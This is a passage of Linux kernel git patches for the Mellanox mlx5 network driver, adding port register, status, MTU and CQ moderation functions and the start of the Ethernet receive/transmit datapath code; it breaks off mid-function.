mdev->hca_caps_cur[MLX5_CAP_ATOMIC], cap) + +#define MLX5_CAP_ATOMIC_MAX(mdev, cap) \ + MLX5_GET(atomic_caps, mdev->hca_caps_max[MLX5_CAP_ATOMIC], cap) + +#define MLX5_CAP_FLOWTABLE(mdev, cap) \ + MLX5_GET(flow_table_nic_cap, mdev->hca_caps_cur[MLX5_CAP_FLOW_TABLE], cap) + +#define MLX5_CAP_FLOWTABLE_MAX(mdev, cap) \ + MLX5_GET(flow_table_nic_cap, mdev->hca_caps_max[MLX5_CAP_FLOW_TABLE], cap) + +#define MLX5_CAP_ODP(mdev, cap)\ + MLX5_GET(odp_cap, mdev->hca_caps_cur[MLX5_CAP_ODP], cap) + #endif /* MLX5_DEVICE_H */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 3fd4fdc1ba16..6b9199163633 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -268,55 +268,7 @@ struct mlx5_cmd { struct mlx5_port_caps { int gid_table_len; int pkey_table_len; -}; - -struct mlx5_general_caps { - u8 log_max_eq; - u8 log_max_cq; - u8 log_max_qp; - u8 log_max_mkey; - u8 log_max_pd; - u8 log_max_srq; - u8 log_max_mrw_sz; - u8 log_max_bsf_list_size; - u8 log_max_klm_list_size; - u32 max_cqes; - int max_wqes; - u32 max_eqes; - u32 max_indirection; - int max_sq_desc_sz; - int max_rq_desc_sz; - int max_dc_sq_desc_sz; - u64 flags; - u16 stat_rate_support; - int log_max_msg; - int num_ports; - u8 log_max_ra_res_qp; - u8 log_max_ra_req_qp; - int max_srq_wqes; - int bf_reg_size; - int bf_regs_per_page; - struct mlx5_port_caps port[MLX5_MAX_PORTS]; - u8 ext_port_cap[MLX5_MAX_PORTS]; - int max_vf; - u32 reserved_lkey; - u8 local_ca_ack_delay; - u8 log_max_mcg; - u32 max_qp_mcg; - int min_page_sz; - int pd_cap; - u32 max_qp_counters; - u32 pkey_table_size; - u8 log_max_ra_req_dc; - u8 log_max_ra_res_dc; - u32 uar_sz; - u8 min_log_pg_sz; - u8 log_max_xrcd; - u16 log_uar_page_sz; -}; - -struct mlx5_caps { - struct mlx5_general_caps gen; + u8 ext_port_cap; }; struct mlx5_cmd_mailbox { @@ -521,7 +473,9 @@ struct mlx5_core_dev { u8 rev_id; char board_id[MLX5_BOARD_ID_LEN]; struct mlx5_cmd cmd; - struct mlx5_caps caps; + struct mlx5_port_caps port_caps[MLX5_MAX_PORTS]; + u32 hca_caps_cur[MLX5_CAP_NUM][MLX5_UN_SZ_DW(hca_cap_union)]; + u32 hca_caps_max[MLX5_CAP_NUM][MLX5_UN_SZ_DW(hca_cap_union)]; phys_addr_t iseg_base; struct mlx5_init_seg __iomem *iseg; void (*event) (struct mlx5_core_dev *dev, @@ -651,8 +605,8 @@ void mlx5_cmd_use_events(struct mlx5_core_dev *dev); void mlx5_cmd_use_polling(struct mlx5_core_dev *dev); int mlx5_cmd_status_to_err(struct mlx5_outbox_hdr *hdr); int mlx5_cmd_status_to_err_v2(void *ptr); -int mlx5_core_get_caps(struct mlx5_core_dev *dev, struct mlx5_caps *caps, - u16 opmod); +int mlx5_core_get_caps(struct mlx5_core_dev *dev, enum mlx5_cap_type cap_type, + enum mlx5_cap_mode cap_mode); int mlx5_cmd_exec(struct mlx5_core_dev *dev, void *in, int in_size, void *out, int out_size); int mlx5_cmd_exec_cb(struct mlx5_core_dev *dev, void *in, int in_size, From adb0c9545bce6f1b1d563e988e6ee5531861d449 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:42 +0300 Subject: [PATCH 496/872] net/mlx5_core: Implement access functions of ptys register fields Those registers will be used by the ethtool to set/get settings. Signed-off-by: Rana Shahout Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/port.c | 77 +++++++++++++++++++ include/linux/mlx5/driver.h | 14 ++++ 2 files changed, 91 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index 49e90f2612d8..6e2d99cc3b61 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -102,3 +102,80 @@ int mlx5_set_port_caps(struct mlx5_core_dev *dev, u8 port_num, u32 caps) return err; } EXPORT_SYMBOL_GPL(mlx5_set_port_caps); + +int mlx5_query_port_ptys(struct mlx5_core_dev *dev, u32 *ptys, + int ptys_size, int proto_mask) +{ + u32 in[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + memset(in, 0, sizeof(in)); + MLX5_SET(ptys_reg, in, local_port, 1); + MLX5_SET(ptys_reg, in, proto_mask, proto_mask); + + err = mlx5_core_access_reg(dev, in, sizeof(in), ptys, + ptys_size, MLX5_REG_PTYS, 0, 0); + + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_ptys); + +int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, + u32 *proto_cap, int proto_mask) +{ + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask); + if (err) + return err; + + if (proto_mask == MLX5_PTYS_EN) + *proto_cap = MLX5_GET(ptys_reg, out, eth_proto_capability); + else + *proto_cap = MLX5_GET(ptys_reg, out, ib_proto_capability); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_proto_cap); + +int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, + u32 *proto_admin, int proto_mask) +{ + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask); + if (err) + return err; + + if (proto_mask == MLX5_PTYS_EN) + *proto_admin = MLX5_GET(ptys_reg, out, eth_proto_admin); + else + *proto_admin = MLX5_GET(ptys_reg, out, ib_proto_admin); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_proto_admin); + +int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, + int proto_mask) +{ + u32 in[MLX5_ST_SZ_DW(ptys_reg)]; + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + memset(in, 0, sizeof(in)); + + MLX5_SET(ptys_reg, in, local_port, 1); + MLX5_SET(ptys_reg, in, proto_mask, proto_mask); + if (proto_mask == MLX5_PTYS_EN) + MLX5_SET(ptys_reg, in, eth_proto_admin, proto_admin); + else + MLX5_SET(ptys_reg, in, ib_proto_admin, proto_admin); + + err = mlx5_core_access_reg(dev, in, sizeof(in), out, + sizeof(out), MLX5_REG_PTYS, 0, 1); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_set_port_proto); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 6b9199163633..266d5498a270 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -504,6 +504,11 @@ enum { MLX5_COMP_EQ_SIZE = 1024, }; +enum { + MLX5_PTYS_IB = 1 << 0, + MLX5_PTYS_EN = 1 << 2, +}; + struct mlx5_db_pgdir { struct list_head list; DECLARE_BITMAP(bitmap, MLX5_DB_PER_PAGE); @@ -686,7 +691,16 @@ void mlx5_qp_debugfs_cleanup(struct mlx5_core_dev *dev); int mlx5_core_access_reg(struct mlx5_core_dev *dev, void *data_in, int size_in, void *data_out, int size_out, u16 reg_num, int arg, int write); + int mlx5_set_port_caps(struct mlx5_core_dev *dev, u8 port_num, u32 caps); +int mlx5_query_port_ptys(struct mlx5_core_dev *dev, u32 *ptys, + int ptys_size, int proto_mask); +int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, + u32 *proto_cap, int proto_mask); +int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, + u32 *proto_admin, int proto_mask); +int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, + int proto_mask); int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); From 4c916a798058c1acf5a980438416020932c24aca Mon Sep 17 00:00:00 2001 From: Rana Shahout Date: Thu, 28 May 2015 22:28:43 +0300 Subject: [PATCH 497/872] net/mlx5_core: Implement get/set port status Implemet get/set port status low level functions to be exposed by the netdev. Signed-off-by: Rana Shahout Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/port.c | 32 +++++++++++++++++++ include/linux/mlx5/driver.h | 8 +++++ 2 files changed, 40 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index 6e2d99cc3b61..742a6fb8debe 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -179,3 +179,35 @@ int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, return err; } EXPORT_SYMBOL_GPL(mlx5_set_port_proto); + +int mlx5_set_port_status(struct mlx5_core_dev *dev, + enum mlx5_port_status status) +{ + u32 in[MLX5_ST_SZ_DW(paos_reg)]; + u32 out[MLX5_ST_SZ_DW(paos_reg)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(paos_reg, in, admin_status, status); + MLX5_SET(paos_reg, in, ase, 1); + + return mlx5_core_access_reg(dev, in, sizeof(in), out, + sizeof(out), MLX5_REG_PAOS, 0, 1); +} + +int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status) +{ + u32 in[MLX5_ST_SZ_DW(paos_reg)]; + u32 out[MLX5_ST_SZ_DW(paos_reg)]; + int err; + + memset(in, 0, sizeof(in)); + + err = mlx5_core_access_reg(dev, in, sizeof(in), out, + sizeof(out), MLX5_REG_PAOS, 0, 0); + if (err) + return err; + + *status = MLX5_GET(paos_reg, out, oper_status); + return err; +} diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 266d5498a270..6438444ab361 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -149,6 +149,11 @@ enum mlx5_dev_event { MLX5_DEV_EVENT_CLIENT_REREG, }; +enum mlx5_port_status { + MLX5_PORT_UP = 1 << 1, + MLX5_PORT_DOWN = 1 << 2, +}; + struct mlx5_uuar_info { struct mlx5_uar *uars; int num_uars; @@ -701,6 +706,9 @@ int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, u32 *proto_admin, int proto_mask); int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, int proto_mask); +int mlx5_set_port_status(struct mlx5_core_dev *dev, + enum mlx5_port_status status); +int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status); int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); From 90b3e38d048f09b22fb50bcd460cea65fd00b2d7 Mon Sep 17 00:00:00 2001 From: Rana Shahout Date: Thu, 28 May 2015 22:28:44 +0300 Subject: [PATCH 498/872] net/mlx5_core: Modify CQ moderation parameters Introduce mlx5_core_modify_cq_moderation() to be used by the netdev, to set hardware coalescing. Signed-off-by: Rana Shahout Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/cq.c | 18 ++++++++++++++++++ include/linux/mlx5/cq.h | 3 +++ 2 files changed, 21 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cq.c b/drivers/net/ethernet/mellanox/mlx5/core/cq.c index eb0cf81f5f45..04ab7e445eae 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/cq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/cq.c @@ -219,6 +219,24 @@ int mlx5_core_modify_cq(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq, } EXPORT_SYMBOL(mlx5_core_modify_cq); +int mlx5_core_modify_cq_moderation(struct mlx5_core_dev *dev, + struct mlx5_core_cq *cq, + u16 cq_period, + u16 cq_max_count) +{ + struct mlx5_modify_cq_mbox_in in; + + memset(&in, 0, sizeof(in)); + + in.cqn = cpu_to_be32(cq->cqn); + in.ctx.cq_period = cpu_to_be16(cq_period); + in.ctx.cq_max_count = cpu_to_be16(cq_max_count); + in.field_select = cpu_to_be32(MLX5_CQ_MODIFY_PERIOD | + MLX5_CQ_MODIFY_COUNT); + + return mlx5_core_modify_cq(dev, cq, &in, sizeof(in)); +} + int mlx5_init_cq_table(struct mlx5_core_dev *dev) { struct mlx5_cq_table *table = &dev->priv.cq_table; diff --git a/include/linux/mlx5/cq.h b/include/linux/mlx5/cq.h index 2695ced222df..abc4767695e4 100644 --- a/include/linux/mlx5/cq.h +++ b/include/linux/mlx5/cq.h @@ -169,6 +169,9 @@ int mlx5_core_query_cq(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq, struct mlx5_query_cq_mbox_out *out); int mlx5_core_modify_cq(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq, struct mlx5_modify_cq_mbox_in *in, int in_sz); +int mlx5_core_modify_cq_moderation(struct mlx5_core_dev *dev, + struct mlx5_core_cq *cq, u16 cq_period, + u16 cq_max_count); int mlx5_debug_cq_add(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq); void mlx5_debug_cq_remove(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq); From e725440e75da8c4d617a31c4e38216acc55c24e3 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:45 +0300 Subject: [PATCH 499/872] net/mlx5_core: Set/Query port MTU commands Introduce set/Query low level functions to access MTU in hardware. To be used by the netdev. Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/port.c | 53 +++++++++++++++++++ include/linux/mlx5/driver.h | 4 ++ 2 files changed, 57 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index 742a6fb8debe..7d3d0f9f328d 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -211,3 +211,56 @@ int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status) *status = MLX5_GET(paos_reg, out, oper_status); return err; } + +static int mlx5_query_port_mtu(struct mlx5_core_dev *dev, + int *admin_mtu, int *max_mtu, int *oper_mtu) +{ + u32 in[MLX5_ST_SZ_DW(pmtu_reg)]; + u32 out[MLX5_ST_SZ_DW(pmtu_reg)]; + int err; + + memset(in, 0, sizeof(in)); + + MLX5_SET(pmtu_reg, in, local_port, 1); + + err = mlx5_core_access_reg(dev, in, sizeof(in), out, + sizeof(out), MLX5_REG_PMTU, 0, 0); + if (err) + return err; + + if (max_mtu) + *max_mtu = MLX5_GET(pmtu_reg, out, max_mtu); + if (oper_mtu) + *oper_mtu = MLX5_GET(pmtu_reg, out, oper_mtu); + if (admin_mtu) + *admin_mtu = MLX5_GET(pmtu_reg, out, admin_mtu); + + return 0; +} + +int mlx5_set_port_mtu(struct mlx5_core_dev *dev, int mtu) +{ + u32 in[MLX5_ST_SZ_DW(pmtu_reg)]; + u32 out[MLX5_ST_SZ_DW(pmtu_reg)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(pmtu_reg, in, admin_mtu, mtu); + MLX5_SET(pmtu_reg, in, local_port, 1); + + return mlx5_core_access_reg(dev, in, sizeof(in), out, sizeof(out), + MLX5_REG_PMTU, 0, 1); +} +EXPORT_SYMBOL_GPL(mlx5_set_port_mtu); + +int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu) +{ + return mlx5_query_port_mtu(dev, NULL, max_mtu, NULL); +} +EXPORT_SYMBOL_GPL(mlx5_query_port_max_mtu); + +int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu) +{ + return mlx5_query_port_mtu(dev, NULL, NULL, oper_mtu); +} +EXPORT_SYMBOL_GPL(mlx5_query_port_oper_mtu); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 6438444ab361..51738472657e 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -710,6 +710,10 @@ int mlx5_set_port_status(struct mlx5_core_dev *dev, enum mlx5_port_status status); int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status); +int mlx5_set_port_mtu(struct mlx5_core_dev *dev, int mtu); +int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu); +int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu); + int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); int mlx5_core_eq_query(struct mlx5_core_dev *dev, struct mlx5_eq *eq, From e586b3b0baee89f4998efd9cc97001c63e3bc744 Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 28 May 2015 22:28:46 +0300 Subject: [PATCH 500/872] net/mlx5: Ethernet Datapath files en_[rt]x.c contains the data path related code specific to tx or rx. en_txrx.c contains data path code which is common for both the rx and tx, this is mainly napi related code. Below are the objects that are being used by the hardware and the driver in the data path: Channel - one channel per IRQ. Every channel object contains: RQ - describes the rx queue TIR - One TIR (Transport Interface Receive) object per flow type. TIR contains attributes for a type of rx flow (e.g IPv4, IPv6 etc). A flow is defined in the Flow Table. Currently TIR describes the RSS hash parameters if exists and LRO attributes. SQ - describes the a tx queue. There is one SQ (Send Queue) per TC (traffic class). TIS - There is one TIS (Transport Interface Send) per TC. It describes the TC and may later be extended to describe more transport properties. Both RQ and SQ inherit from the object WQ (work queue). This common code to describe the layout of CQE's WQE's in memory is in the files wq.[cj] For every channel there is one NAPI context that is used for RX and for TX. Driver is using netdev_alloc_skb() to allocate skb's. Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/en_rx.c | 249 +++++++++++++ .../net/ethernet/mellanox/mlx5/core/en_tx.c | 344 ++++++++++++++++++ .../net/ethernet/mellanox/mlx5/core/en_txrx.c | 107 ++++++ drivers/net/ethernet/mellanox/mlx5/core/wq.c | 183 ++++++++++ drivers/net/ethernet/mellanox/mlx5/core/wq.h | 171 +++++++++ 5 files changed, 1054 insertions(+) create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_rx.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_tx.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/wq.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/wq.h diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c new file mode 100644 index 000000000000..ce1317cdabd7 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c @@ -0,0 +1,249 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include +#include +#include "en.h" + +static inline int mlx5e_alloc_rx_wqe(struct mlx5e_rq *rq, + struct mlx5e_rx_wqe *wqe, u16 ix) +{ + struct sk_buff *skb; + dma_addr_t dma_addr; + + skb = netdev_alloc_skb(rq->netdev, rq->wqe_sz); + if (unlikely(!skb)) + return -ENOMEM; + + skb_reserve(skb, MLX5E_NET_IP_ALIGN); + + dma_addr = dma_map_single(rq->pdev, + /* hw start padding */ + skb->data - MLX5E_NET_IP_ALIGN, + /* hw end padding */ + rq->wqe_sz, + DMA_FROM_DEVICE); + + if (unlikely(dma_mapping_error(rq->pdev, dma_addr))) + goto err_free_skb; + + *((dma_addr_t *)skb->cb) = dma_addr; + wqe->data.addr = cpu_to_be64(dma_addr + MLX5E_NET_IP_ALIGN); + + rq->skb[ix] = skb; + + return 0; + +err_free_skb: + dev_kfree_skb(skb); + + return -ENOMEM; +} + +bool mlx5e_post_rx_wqes(struct mlx5e_rq *rq) +{ + struct mlx5_wq_ll *wq = &rq->wq; + + if (unlikely(!test_bit(MLX5E_RQ_STATE_POST_WQES_ENABLE, &rq->state))) + return false; + + while (!mlx5_wq_ll_is_full(wq)) { + struct mlx5e_rx_wqe *wqe = mlx5_wq_ll_get_wqe(wq, wq->head); + + if (unlikely(mlx5e_alloc_rx_wqe(rq, wqe, wq->head))) + break; + + mlx5_wq_ll_push(wq, be16_to_cpu(wqe->next.next_wqe_index)); + } + + /* ensure wqes are visible to device before updating doorbell record */ + dma_wmb(); + + mlx5_wq_ll_update_db_record(wq); + + return !mlx5_wq_ll_is_full(wq); +} + +static void mlx5e_lro_update_hdr(struct sk_buff *skb, struct mlx5_cqe64 *cqe) +{ + struct ethhdr *eth = (struct ethhdr *)(skb->data); + struct iphdr *ipv4 = (struct iphdr *)(skb->data + ETH_HLEN); + struct ipv6hdr *ipv6 = (struct ipv6hdr *)(skb->data + ETH_HLEN); + struct tcphdr *tcp; + + u8 l4_hdr_type = get_cqe_l4_hdr_type(cqe); + int tcp_ack = ((CQE_L4_HDR_TYPE_TCP_ACK_NO_DATA == l4_hdr_type) || + (CQE_L4_HDR_TYPE_TCP_ACK_AND_DATA == l4_hdr_type)); + + u16 tot_len = be32_to_cpu(cqe->byte_cnt) - ETH_HLEN; + + if (eth->h_proto == htons(ETH_P_IP)) { + tcp = (struct tcphdr *)(skb->data + ETH_HLEN + + sizeof(struct iphdr)); + ipv6 = NULL; + } else { + tcp = (struct tcphdr *)(skb->data + ETH_HLEN + + sizeof(struct ipv6hdr)); + ipv4 = NULL; + } + + if (get_cqe_lro_tcppsh(cqe)) + tcp->psh = 1; + + if (tcp_ack) { + tcp->ack = 1; + tcp->ack_seq = cqe->lro_ack_seq_num; + tcp->window = cqe->lro_tcp_win; + } + + if (ipv4) { + ipv4->ttl = cqe->lro_min_ttl; + ipv4->tot_len = cpu_to_be16(tot_len); + ipv4->check = 0; + ipv4->check = ip_fast_csum((unsigned char *)ipv4, + ipv4->ihl); + } else { + ipv6->hop_limit = cqe->lro_min_ttl; + ipv6->payload_len = cpu_to_be16(tot_len - + sizeof(struct ipv6hdr)); + } +} + +static inline void mlx5e_skb_set_hash(struct mlx5_cqe64 *cqe, + struct sk_buff *skb) +{ + u8 cht = cqe->rss_hash_type; + int ht = (cht & CQE_RSS_HTYPE_L4) ? PKT_HASH_TYPE_L4 : + (cht & CQE_RSS_HTYPE_IP) ? PKT_HASH_TYPE_L3 : + PKT_HASH_TYPE_NONE; + skb_set_hash(skb, be32_to_cpu(cqe->rss_hash_result), ht); +} + +static inline void mlx5e_build_rx_skb(struct mlx5_cqe64 *cqe, + struct mlx5e_rq *rq, + struct sk_buff *skb) +{ + struct net_device *netdev = rq->netdev; + u32 cqe_bcnt = be32_to_cpu(cqe->byte_cnt); + int lro_num_seg; + + skb_put(skb, cqe_bcnt); + + lro_num_seg = be32_to_cpu(cqe->srqn) >> 24; + if (lro_num_seg > 1) { + mlx5e_lro_update_hdr(skb, cqe); + skb_shinfo(skb)->gso_size = MLX5E_PARAMS_DEFAULT_LRO_WQE_SZ; + rq->stats.lro_packets++; + rq->stats.lro_bytes += cqe_bcnt; + } + + if (likely(netdev->features & NETIF_F_RXCSUM) && + (cqe->hds_ip_ext & CQE_L2_OK) && + (cqe->hds_ip_ext & CQE_L3_OK) && + (cqe->hds_ip_ext & CQE_L4_OK)) { + skb->ip_summed = CHECKSUM_UNNECESSARY; + } else { + skb->ip_summed = CHECKSUM_NONE; + rq->stats.csum_none++; + } + + skb->protocol = eth_type_trans(skb, netdev); + + skb_record_rx_queue(skb, rq->ix); + + if (likely(netdev->features & NETIF_F_RXHASH)) + mlx5e_skb_set_hash(cqe, skb); + + if (cqe_has_vlan(cqe)) + __vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q), + be16_to_cpu(cqe->vlan_info)); +} + +bool mlx5e_poll_rx_cq(struct mlx5e_cq *cq, int budget) +{ + struct mlx5e_rq *rq = cq->sqrq; + int i; + + /* avoid accessing cq (dma coherent memory) if not needed */ + if (!test_and_clear_bit(MLX5E_CQ_HAS_CQES, &cq->flags)) + return false; + + for (i = 0; i < budget; i++) { + struct mlx5e_rx_wqe *wqe; + struct mlx5_cqe64 *cqe; + struct sk_buff *skb; + __be16 wqe_counter_be; + u16 wqe_counter; + + cqe = mlx5e_get_cqe(cq); + if (!cqe) + break; + + wqe_counter_be = cqe->wqe_counter; + wqe_counter = be16_to_cpu(wqe_counter_be); + wqe = mlx5_wq_ll_get_wqe(&rq->wq, wqe_counter); + skb = rq->skb[wqe_counter]; + rq->skb[wqe_counter] = NULL; + + dma_unmap_single(rq->pdev, + *((dma_addr_t *)skb->cb), + skb_end_offset(skb), + DMA_FROM_DEVICE); + + if (unlikely((cqe->op_own >> 4) != MLX5_CQE_RESP_SEND)) { + rq->stats.wqe_err++; + dev_kfree_skb(skb); + goto wq_ll_pop; + } + + mlx5e_build_rx_skb(cqe, rq, skb); + rq->stats.packets++; + napi_gro_receive(cq->napi, skb); + +wq_ll_pop: + mlx5_wq_ll_pop(&rq->wq, wqe_counter_be, + &wqe->next.next_wqe_index); + } + + mlx5_cqwq_update_db_record(&cq->wq); + + /* ensure cq space is freed before enabling more cqes */ + wmb(); + + if (i == budget) { + set_bit(MLX5E_CQ_HAS_CQES, &cq->flags); + return true; + } + + return false; +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c new file mode 100644 index 000000000000..8020986cdaf6 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c @@ -0,0 +1,344 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include +#include "en.h" + +static void mlx5e_dma_pop_last_pushed(struct mlx5e_sq *sq, dma_addr_t *addr, + u32 *size) +{ + sq->dma_fifo_pc--; + *addr = sq->dma_fifo[sq->dma_fifo_pc & sq->dma_fifo_mask].addr; + *size = sq->dma_fifo[sq->dma_fifo_pc & sq->dma_fifo_mask].size; +} + +static void mlx5e_dma_unmap_wqe_err(struct mlx5e_sq *sq, struct sk_buff *skb) +{ + dma_addr_t addr; + u32 size; + int i; + + for (i = 0; i < MLX5E_TX_SKB_CB(skb)->num_dma; i++) { + mlx5e_dma_pop_last_pushed(sq, &addr, &size); + dma_unmap_single(sq->pdev, addr, size, DMA_TO_DEVICE); + } +} + +static inline void mlx5e_dma_push(struct mlx5e_sq *sq, dma_addr_t addr, + u32 size) +{ + sq->dma_fifo[sq->dma_fifo_pc & sq->dma_fifo_mask].addr = addr; + sq->dma_fifo[sq->dma_fifo_pc & sq->dma_fifo_mask].size = size; + sq->dma_fifo_pc++; +} + +static inline void mlx5e_dma_get(struct mlx5e_sq *sq, u32 i, dma_addr_t *addr, + u32 *size) +{ + *addr = sq->dma_fifo[i & sq->dma_fifo_mask].addr; + *size = sq->dma_fifo[i & sq->dma_fifo_mask].size; +} + +u16 mlx5e_select_queue(struct net_device *dev, struct sk_buff *skb, + void *accel_priv, select_queue_fallback_t fallback) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int channel_ix = fallback(dev, skb); + int up = 